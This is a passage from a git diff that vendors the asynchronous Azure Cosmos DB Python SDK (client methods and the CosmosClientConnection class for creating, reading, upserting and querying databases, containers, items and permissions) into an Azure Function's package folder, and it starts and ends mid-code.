str): + return "dbs/{}".format(database_or_id) + try: + return cast("DatabaseProxy", database_or_id).database_link + except AttributeError: + pass + database_id = cast("Dict[str, str]", database_or_id)["id"] + return "dbs/{}".format(database_id) + + @distributed_trace_async + async def create_database( # pylint: disable=redefined-builtin + self, + id: str, + **kwargs: Any + ) -> DatabaseProxy: + """ + Create a new database with the given ID (name). + + :param str id: ID (name) of the database to create. + :keyword int offer_throughput: The provisioned throughput for this offer. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosResourceExistsError: Database with the given ID already exists. + :returns: A DatabaseProxy instance representing the new database. + :rtype: ~azure.cosmos.aio.DatabaseProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_database] + :end-before: [END create_database] + :language: python + :dedent: 0 + :caption: Create a database in the Cosmos DB account: + :name: create_database + """ + + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + offer_throughput = kwargs.pop('offer_throughput', None) + if offer_throughput is not None: + request_options["offerThroughput"] = offer_throughput + + result = await self.client_connection.CreateDatabase(database=dict(id=id), options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return DatabaseProxy(self.client_connection, id=result["id"], properties=result) + + @distributed_trace_async + async def create_database_if_not_exists( # pylint: disable=redefined-builtin + self, + id: str, + **kwargs: Any + ) -> DatabaseProxy: + """ + Create the database if it does not exist already. + + If the database already exists, the existing settings are returned. + + ..note:: + This function does not check or update existing database settings or + offer throughput if they differ from what is passed in. + + :param str id: ID (name) of the database to read or create. + :keyword int offer_throughput: The provisioned throughput for this offer. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The database read or creation failed. + :returns: A DatabaseProxy instance representing the database. + :rtype: ~azure.cosmos.DatabaseProxy + """ + try: + database_proxy = self.get_database_client(id) + await database_proxy.read(**kwargs) + return database_proxy + except CosmosResourceNotFoundError: + return await self.create_database( + id, + **kwargs + ) + + def get_database_client(self, database: Union[str, DatabaseProxy, Dict[str, Any]]) -> DatabaseProxy: + """Retrieve an existing database with the ID (name) `id`. + + :param database: The ID (name), dict representing the properties, or :class:`DatabaseProxy` + instance of the database to get. + :type database: Union[str, ~azure.cosmos.DatabaseProxy, Dict[str, Any]] + :returns: A `DatabaseProxy` instance representing the retrieved database. + :rtype: ~azure.cosmos.DatabaseProxy + """ + try: + id_value = database.id + except AttributeError: + try: + id_value = database['id'] + except TypeError: + id_value = database + + return DatabaseProxy(self.client_connection, id_value) + + @distributed_trace + def list_databases( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List the databases in a Cosmos DB SQL database account. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str]], None] + :returns: An AsyncItemPaged of database properties (dicts). + :rtype: AsyncItemPaged[Dict[str, str]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadDatabases(options=feed_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result + + @distributed_trace + def query_databases( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Query the databases in a Cosmos DB SQL database account. + + :keyword Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. + Each parameter is a dict() with 'name' and 'value' keys. + :paramtype parameters: List[Dict[str, Any]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str]], None] + :returns: An AsyncItemPaged of database properties (dicts). + :rtype: AsyncItemPaged[Dict[str, str]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + query = kwargs.pop('query', None) + result = self.client_connection.QueryDatabases( + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result + + @distributed_trace_async + async def delete_database( + self, + database: Union[str, DatabaseProxy, Dict[str, Any]], + **kwargs: Any + ) -> None: + """Delete the database with the given ID (name). + + :param database: The ID (name), dict representing the properties, or :class:`DatabaseProxy` + instance of the database to delete. + :type database: Union[str, ~azure.cosmos.DatabaseProxy, Dict[str, Any]] + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the database couldn't be deleted. + :rtype: None + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + database_link = self._get_database_link(database) + await self.client_connection.DeleteDatabase(database_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + + @distributed_trace_async + async def _get_database_account(self, **kwargs: Any) -> DatabaseAccount: + """Retrieve the database account information. + + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str]], None] + :returns: A `DatabaseAccount` instance representing the Cosmos DB Database Account. + :rtype: ~azure.cosmos.DatabaseAccount + """ + response_hook = kwargs.pop('response_hook', None) + result = await self.client_connection.GetDatabaseAccount(**kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client_connection_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client_connection_async.py new file mode 100644 index 0000000..684bfc7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client_connection_async.py @@ -0,0 +1,2542 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +# disable (too-many-lines) check +# pylint: disable=C0302 + +"""Document client class for the Azure Cosmos database service. +""" +# https://github.com/PyCQA/pylint/issues/3112 +# Currently pylint is locked to 2.3.3 and this is fixed in 2.4.4 +from typing import Dict, Any, Optional, TypeVar # pylint: disable=unused-import +from urllib.parse import urlparse +from urllib3.util.retry import Retry +from azure.core.async_paging import AsyncItemPaged +from azure.core import AsyncPipelineClient +from azure.core.exceptions import raise_with_traceback # type: ignore +from azure.core.pipeline.policies import ( + AsyncHTTPPolicy, + ContentDecodePolicy, + HeadersPolicy, + UserAgentPolicy, + NetworkTraceLoggingPolicy, + CustomHookPolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + ProxyPolicy) + +from .. import _base as base +from .. import documents +from ..documents import ConnectionPolicy +from .. import _constants as constants +from .. import http_constants +from . import _query_iterable_async as query_iterable +from .. import _runtime_constants as runtime_constants +from .. import _request_object +from . import _asynchronous_request as asynchronous_request +from . import _global_endpoint_manager_async as global_endpoint_manager_async +from .._routing.aio import routing_map_provider +from ._retry_utility_async import _ConnectionRetryPolicy +from .. import _session +from .. import _utils +from ..partition_key import _Undefined, _Empty +from ._auth_policy_async import AsyncCosmosBearerTokenCredentialPolicy + +ClassType = TypeVar("ClassType") +# pylint: disable=protected-access + + +class CosmosClientConnection(object): # pylint: disable=too-many-public-methods,too-many-instance-attributes + """Represents a document client. + + Provides a client-side logical representation of the Azure Cosmos + service. This client is used to configure and execute requests against the + service. + + The service client encapsulates the endpoint and credentials used to access + the Azure Cosmos service. + """ + + class _QueryCompatibilityMode: + Default = 0 + Query = 1 + SqlQuery = 2 + + # default number precisions + _DefaultNumberHashPrecision = 3 + _DefaultNumberRangePrecision = -1 + + # default string precision + _DefaultStringHashPrecision = 3 + _DefaultStringRangePrecision = -1 + + def __init__( + self, + url_connection, # type: str + auth, # type: Dict[str, Any] + connection_policy=None, # type: Optional[ConnectionPolicy] + consistency_level=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """ + :param str url_connection: + The URL for connecting to the DB server. + :param dict auth: + Contains 'masterKey' or 'resourceTokens', where + auth['masterKey'] is the default authorization key to use to + create the client, and auth['resourceTokens'] is the alternative + authorization key. + :param documents.ConnectionPolicy connection_policy: + The connection policy for the client. + :param documents.ConsistencyLevel consistency_level: + The default consistency policy for client operations. + + """ + self.url_connection = url_connection + + self.master_key = None + self.resource_tokens = None + self.aad_credentials = None + if auth is not None: + self.master_key = auth.get("masterKey") + self.resource_tokens = auth.get("resourceTokens") + self.aad_credentials = auth.get("clientSecretCredential") + + if auth.get("permissionFeed"): + self.resource_tokens = {} + for permission_feed in auth["permissionFeed"]: + resource_parts = permission_feed["resource"].split("/") + id_ = resource_parts[-1] + self.resource_tokens[id_] = permission_feed["_token"] + + self.connection_policy = connection_policy or ConnectionPolicy() + + self.partition_resolvers = {} # type: Dict[str, Any] + + self.partition_key_definition_cache = {} # type: Dict[str, Any] + + self.default_headers = { + http_constants.HttpHeaders.CacheControl: "no-cache", + http_constants.HttpHeaders.Version: http_constants.Versions.CurrentVersion, + # For single partition query with aggregate functions we would try to accumulate the results on the SDK. + # We need to set continuation as not expected. + http_constants.HttpHeaders.IsContinuationExpected: False, + } + + if consistency_level is not None: + self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + + # Keeps the latest response headers from the server. + self.last_response_headers = None + + self._useMultipleWriteLocations = False + self._global_endpoint_manager = global_endpoint_manager_async._GlobalEndpointManager(self) + + retry_policy = None + if isinstance(self.connection_policy.ConnectionRetryConfiguration, AsyncHTTPPolicy): + retry_policy = self.connection_policy.ConnectionRetryConfiguration + elif isinstance(self.connection_policy.ConnectionRetryConfiguration, int): + retry_policy = _ConnectionRetryPolicy(total=self.connection_policy.ConnectionRetryConfiguration) + elif isinstance(self.connection_policy.ConnectionRetryConfiguration, Retry): + # Convert a urllib3 retry policy to a Pipeline policy + retry_policy = _ConnectionRetryPolicy( + retry_total=self.connection_policy.ConnectionRetryConfiguration.total, + retry_connect=self.connection_policy.ConnectionRetryConfiguration.connect, + retry_read=self.connection_policy.ConnectionRetryConfiguration.read, + retry_status=self.connection_policy.ConnectionRetryConfiguration.status, + retry_backoff_max=self.connection_policy.ConnectionRetryConfiguration.BACKOFF_MAX, + retry_on_status_codes=list(self.connection_policy.ConnectionRetryConfiguration.status_forcelist), + retry_backoff_factor=self.connection_policy.ConnectionRetryConfiguration.backoff_factor + ) + else: + raise TypeError( + "Unsupported retry policy. Must be an azure.cosmos.ConnectionRetryPolicy, int, or urllib3.Retry") + + proxies = kwargs.pop('proxies', {}) + if self.connection_policy.ProxyConfiguration and self.connection_policy.ProxyConfiguration.Host: + host = self.connection_policy.ProxyConfiguration.Host + url = urlparse(host) + proxy = host if url.port else host + ":" + str(self.connection_policy.ProxyConfiguration.Port) + proxies.update({url.scheme: proxy}) + + self._user_agent = _utils.get_user_agent_async() + + credentials_policy = None + if self.aad_credentials: + scopes = base.create_scope_from_url(self.url_connection) + credentials_policy = AsyncCosmosBearerTokenCredentialPolicy(self.aad_credentials, scopes) + + policies = [ + HeadersPolicy(**kwargs), + ProxyPolicy(proxies=proxies), + UserAgentPolicy(base_user_agent=self._user_agent, **kwargs), + ContentDecodePolicy(), + retry_policy, + credentials_policy, + CustomHookPolicy(**kwargs), + NetworkTraceLoggingPolicy(**kwargs), + DistributedTracingPolicy(**kwargs), + HttpLoggingPolicy(**kwargs), + ] + + transport = kwargs.pop("transport", None) + self.pipeline_client = AsyncPipelineClient(base_url=url_connection, transport=transport, policies=policies) + self._setup_kwargs = kwargs + + # Query compatibility mode. + # Allows to specify compatibility mode used by client when making query requests. Should be removed when + # application/sql is no longer supported. + self._query_compatibility_mode = CosmosClientConnection._QueryCompatibilityMode.Default + + # Routing map provider + self._routing_map_provider = routing_map_provider.SmartRoutingMapProvider(self) + + @property + def _Session(self): + """Gets the session object from the client. """ + return self.session + + @_Session.setter + def _Session(self, session): + """Sets a session object on the document client. + + This will override the existing session + """ + self.session = session + + @property + def _WriteEndpoint(self): + """Gets the curent write endpoint for a geo-replicated database account. + """ + return self._global_endpoint_manager.get_write_endpoint() + + @property + def _ReadEndpoint(self): + """Gets the curent read endpoint for a geo-replicated database account. + """ + return self._global_endpoint_manager.get_read_endpoint() + + async def _setup(self): + + if 'database_account' not in self._setup_kwargs: + database_account = await self._global_endpoint_manager._GetDatabaseAccount( + **self._setup_kwargs) + self._setup_kwargs['database_account'] = database_account + await self._global_endpoint_manager.force_refresh(self._setup_kwargs['database_account']) + else: + database_account = self._setup_kwargs.get('database_account') + + # Save the choice that was made (either None or some value) and branch to set or get the consistency + if self.default_headers.get(http_constants.HttpHeaders.ConsistencyLevel): + user_defined_consistency = self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] + else: + # Use database_account if no consistency passed in to verify consistency level to be used + user_defined_consistency = self._check_if_account_session_consistency(database_account) + + if user_defined_consistency == documents.ConsistencyLevel.Session: + # create a Session if the user wants Session consistency + self.session = _session.Session(self.url_connection) + else: + self.session = None # type: ignore + + def _check_if_account_session_consistency( + self, + database_account: ClassType, + ) -> str: + """Checks account consistency level to set header if needed. + :param database_account: The database account to be used to check consistency levels + :type database_account: ~azure.cosmos.documents.DatabaseAccount + :returns consistency_level: the account consistency level + :rtype: str + """ + # Set to default level present in account + user_consistency_policy = database_account.ConsistencyPolicy + consistency_level = user_consistency_policy.get(constants._Constants.DefaultConsistencyLevel) + + if consistency_level == documents.ConsistencyLevel.Session: + # We only set the header if we're using session consistency in the account in order to keep + # the current update_session logic which uses the header + self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + + return consistency_level + + + def _GetDatabaseIdWithPathForUser(self, database_link, user): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(user) + path = base.GetPathFromLink(database_link, "users") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return database_id, path + + def _GetContainerIdWithPathForSproc(self, collection_link, sproc): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(sproc) + sproc = sproc.copy() + if sproc.get("serverScript"): + sproc["body"] = str(sproc.pop("serverScript", "")) + elif sproc.get("body"): + sproc["body"] = str(sproc["body"]) + path = base.GetPathFromLink(collection_link, "sprocs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, path, sproc + + def _GetContainerIdWithPathForTrigger(self, collection_link, trigger): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(trigger) + trigger = trigger.copy() + if trigger.get("serverScript"): + trigger["body"] = str(trigger.pop("serverScript", "")) + elif trigger.get("body"): + trigger["body"] = str(trigger["body"]) + + path = base.GetPathFromLink(collection_link, "triggers") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, path, trigger + + def _GetContainerIdWithPathForUDF(self, collection_link, udf): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(udf) + udf = udf.copy() + if udf.get("serverScript"): + udf["body"] = str(udf.pop("serverScript", "")) + elif udf.get("body"): + udf["body"] = str(udf["body"]) + + path = base.GetPathFromLink(collection_link, "udfs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, path, udf + + async def GetDatabaseAccount(self, url_connection=None, **kwargs): + """Gets database account info. + + :return: + The Database Account. + :rtype: + documents.DatabaseAccount + + """ + if url_connection is None: + url_connection = self.url_connection + + initial_headers = dict(self.default_headers) + headers = base.GetHeaders(self, initial_headers, "get", "", "", "", {}) # path # id # type + + request_params = _request_object.RequestObject("databaseaccount", documents._OperationType.Read, url_connection) + result, self.last_response_headers = await self.__Get("", request_params, headers, **kwargs) + database_account = documents.DatabaseAccount() + database_account.DatabasesLink = "/dbs/" + database_account.MediaLink = "/media/" + if http_constants.HttpHeaders.MaxMediaStorageUsageInMB in self.last_response_headers: + database_account.MaxMediaStorageUsageInMB = self.last_response_headers[ + http_constants.HttpHeaders.MaxMediaStorageUsageInMB + ] + if http_constants.HttpHeaders.CurrentMediaStorageUsageInMB in self.last_response_headers: + database_account.CurrentMediaStorageUsageInMB = self.last_response_headers[ + http_constants.HttpHeaders.CurrentMediaStorageUsageInMB + ] + database_account.ConsistencyPolicy = result.get(constants._Constants.UserConsistencyPolicy) + + # WritableLocations and ReadableLocations fields will be available only for geo-replicated database accounts + if constants._Constants.WritableLocations in result: + database_account._WritableLocations = result[constants._Constants.WritableLocations] + if constants._Constants.ReadableLocations in result: + database_account._ReadableLocations = result[constants._Constants.ReadableLocations] + if constants._Constants.EnableMultipleWritableLocations in result: + database_account._EnableMultipleWritableLocations = result[ + constants._Constants.EnableMultipleWritableLocations + ] + + self._useMultipleWriteLocations = ( + self.connection_policy.UseMultipleWriteLocations and database_account._EnableMultipleWritableLocations + ) + return database_account + + async def CreateDatabase(self, database, options=None, **kwargs): + """Creates a database. + + :param dict database: + The Azure Cosmos database to create. + :param dict options: + The request options for the request. + + :return: + The Database that was created. + :rtype: dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(database) + path = "/dbs" + return await self.Create(database, path, "dbs", None, None, options, **kwargs) + + async def CreateUser(self, database_link, user, options=None, **kwargs): + """Creates a user. + + :param str database_link: + The link to the database. + :param dict user: + The Azure Cosmos user to create. + :param dict options: + The request options for the request. + + :return: + The created User. + :rtype: + dict + + """ + if options is None: + options = {} + + database_id, path = self._GetDatabaseIdWithPathForUser(database_link, user) + return await self.Create(user, path, "users", database_id, None, options, **kwargs) + + async def CreateContainer(self, database_link, collection, options=None, **kwargs): + """Creates a collection in a database. + + :param str database_link: + The link to the database. + :param dict collection: + The Azure Cosmos collection to create. + :param dict options: + The request options for the request. + + :return: The Collection that was created. + :rtype: dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(collection) + path = base.GetPathFromLink(database_link, "colls") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return await self.Create(collection, path, "colls", database_id, None, options, **kwargs) + + async def CreateItem(self, database_or_container_link, document, options=None, **kwargs): + """Creates a document in a collection. + + :param str database_or_container_link: + The link to the database when using partitioning, otherwise link to the document collection. + :param dict document: + The Azure Cosmos document to create. + :param dict options: + The request options for the request. + :param bool options['disableAutomaticIdGeneration']: + Disables the automatic id generation. If id is missing in the body and this + option is true, an error will be returned. + + :return: + The created Document. + :rtype: + dict + + """ + # Python's default arguments are evaluated once when the function is defined, + # not each time the function is called (like it is in say, Ruby). This means + # that if you use a mutable default argument and mutate it, you will and have + # mutated that object for all future calls to the function as well. So, using + # a non-mutable default in this case(None) and assigning an empty dict(mutable) + # inside the method For more details on this gotcha, please refer + # http://docs.python-guide.org/en/latest/writing/gotchas/ + if options is None: + options = {} + + # We check the link to be document collection link since it can be database + # link in case of client side partitioning + collection_id, document, path = self._GetContainerIdWithPathForItem( + database_or_container_link, document, options + ) + + if base.IsItemContainerLink(database_or_container_link): + options = await self._AddPartitionKey(database_or_container_link, document, options) + + return await self.Create(document, path, "docs", collection_id, None, options, **kwargs) + + async def CreatePermission(self, user_link, permission, options=None, **kwargs): + """Creates a permission for a user. + + :param str user_link: + The link to the user entity. + :param dict permission: + The Azure Cosmos user permission to create. + :param dict options: + The request options for the request. + + :return: + The created Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path, user_id = self._GetUserIdWithPathForPermission(permission, user_link) + return await self.Create(permission, path, "permissions", user_id, None, options, **kwargs) + + async def CreateUserDefinedFunction(self, collection_link, udf, options=None, **kwargs): + """Creates a user-defined function in a collection. + + :param str collection_link: + The link to the collection. + :param str udf: + :param dict options: + The request options for the request. + + :return: + The created UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, udf = self._GetContainerIdWithPathForUDF(collection_link, udf) + return await self.Create(udf, path, "udfs", collection_id, None, options, **kwargs) + + async def CreateTrigger(self, collection_link, trigger, options=None, **kwargs): + """Creates a trigger in a collection. + + :param str collection_link: + The link to the document collection. + :param dict trigger: + :param dict options: + The request options for the request. + + :return: + The created Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, trigger = self._GetContainerIdWithPathForTrigger(collection_link, trigger) + return await self.Create(trigger, path, "triggers", collection_id, None, options, **kwargs) + + async def CreateStoredProcedure(self, collection_link, sproc, options=None, **kwargs): + """Creates a stored procedure in a collection. + + :param str collection_link: + The link to the document collection. + :param str sproc: + :param dict options: + The request options for the request. + + :return: + The created Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, sproc = self._GetContainerIdWithPathForSproc(collection_link, sproc) + return await self.Create(sproc, path, "sprocs", collection_id, None, options, **kwargs) + + async def ExecuteStoredProcedure(self, sproc_link, params, options=None, **kwargs): + """Executes a store procedure. + + :param str sproc_link: + The link to the stored procedure. + :param dict params: + List or None + :param dict options: + The request options for the request. + + :return: + The Stored Procedure response. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = dict(self.default_headers) + initial_headers.update({http_constants.HttpHeaders.Accept: (runtime_constants.MediaTypes.Json)}) + + if params and not isinstance(params, list): + params = [params] + + path = base.GetPathFromLink(sproc_link) + sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link) + headers = base.GetHeaders(self, initial_headers, "post", path, sproc_id, "sprocs", options) + + # ExecuteStoredProcedure will use WriteEndpoint since it uses POST operation + request_params = _request_object.RequestObject("sprocs", documents._OperationType.ExecuteJavaScript) + result, self.last_response_headers = await self.__Post(path, request_params, params, headers, **kwargs) + return result + + async def Create(self, body, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin + """Creates a Azure Cosmos resource and returns it. + + :param dict body: + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The created Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "post", path, id, typ, options) + # Create will use WriteEndpoint since it uses POST operation + + request_params = _request_object.RequestObject(typ, documents._OperationType.Create) + result, self.last_response_headers = await self.__Post(path, request_params, body, headers, **kwargs) + + # update session for write request + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + return result + + async def UpsertUser(self, database_link, user, options=None, **kwargs): + """Upserts a user. + + :param str database_link: + The link to the database. + :param dict user: + The Azure Cosmos user to upsert. + :param dict options: + The request options for the request. + + :return: + The upserted User. + :rtype: dict + """ + if options is None: + options = {} + + database_id, path = self._GetDatabaseIdWithPathForUser(database_link, user) + return await self.Upsert(user, path, "users", database_id, None, options, **kwargs) + + async def UpsertPermission(self, user_link, permission, options=None, **kwargs): + """Upserts a permission for a user. + + :param str user_link: + The link to the user entity. + :param dict permission: + The Azure Cosmos user permission to upsert. + :param dict options: + The request options for the request. + + :return: + The upserted permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path, user_id = self._GetUserIdWithPathForPermission(permission, user_link) + return await self.Upsert(permission, path, "permissions", user_id, None, options, **kwargs) + + async def UpsertItem(self, database_or_container_link, document, options=None, **kwargs): + """Upserts a document in a collection. + + :param str database_or_container_link: + The link to the database when using partitioning, otherwise link to the document collection. + :param dict document: + The Azure Cosmos document to upsert. + :param dict options: + The request options for the request. + :param bool options['disableAutomaticIdGeneration']: + Disables the automatic id generation. If id is missing in the body and this + option is true, an error will be returned. + + :return: + The upserted Document. + :rtype: + dict + + """ + # Python's default arguments are evaluated once when the function is defined, + # not each time the function is called (like it is in say, Ruby). This means + # that if you use a mutable default argument and mutate it, you will and have + # mutated that object for all future calls to the function as well. So, using + # a non-mutable deafult in this case(None) and assigning an empty dict(mutable) + # inside the method For more details on this gotcha, please refer + # http://docs.python-guide.org/en/latest/writing/gotchas/ + if options is None: + options = {} + + # We check the link to be document collection link since it can be database + # link in case of client side partitioning + if base.IsItemContainerLink(database_or_container_link): + options = await self._AddPartitionKey(database_or_container_link, document, options) + + collection_id, document, path = self._GetContainerIdWithPathForItem( + database_or_container_link, document, options + ) + return await self.Upsert(document, path, "docs", collection_id, None, options, **kwargs) + + async def Upsert(self, body, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin + """Upserts a Azure Cosmos resource and returns it. + + :param dict body: + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The upserted Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "post", path, id, typ, options) + + headers[http_constants.HttpHeaders.IsUpsert] = True + + # Upsert will use WriteEndpoint since it uses POST operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Upsert) + result, self.last_response_headers = await self.__Post(path, request_params, body, headers, **kwargs) + # update session for write request + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + return result + + async def __Post(self, path, request_params, body, req_headers, **kwargs): + """Azure Cosmos 'POST' async http request. + + :params str url: + :params str path: + :params (str, unicode, dict) body: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.post(url=path, headers=req_headers) + return await asynchronous_request.AsynchronousRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=body, + **kwargs + ) + + async def ReadDatabase(self, database_link, options=None, **kwargs): + """Reads a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + :return: + The Database that was read. + :rtype: dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link) + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return await self.Read(path, "dbs", database_id, None, options, **kwargs) + + async def ReadContainer(self, collection_link, options=None, **kwargs): + """Reads a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + The read Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return await self.Read(path, "colls", collection_id, None, options, **kwargs) + + async def ReadItem(self, document_link, options=None, **kwargs): + """Reads a document. + + :param str document_link: + The link to the document. + :param dict options: + The request options for the request. + + :return: + The read Document. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(document_link) + document_id = base.GetResourceIdOrFullNameFromLink(document_link) + return await self.Read(path, "docs", document_id, None, options, **kwargs) + + async def ReadUser(self, user_link, options=None, **kwargs): + """Reads a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + The read User. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return await self.Read(path, "users", user_id, None, options, **kwargs) + + async def ReadPermission(self, permission_link, options=None, **kwargs): + """Reads a permission. + + :param str permission_link: + The link to the permission. + :param dict options: + The request options for the request. + + :return: + The read permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return await self.Read(path, "permissions", permission_id, None, options, **kwargs) + + async def ReadUserDefinedFunction(self, udf_link, options=None, **kwargs): + """Reads a user-defined function. + + :param str udf_link: + The link to the user-defined function. + :param dict options: + The request options for the request. + + :return: + The read UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(udf_link) + udf_id = 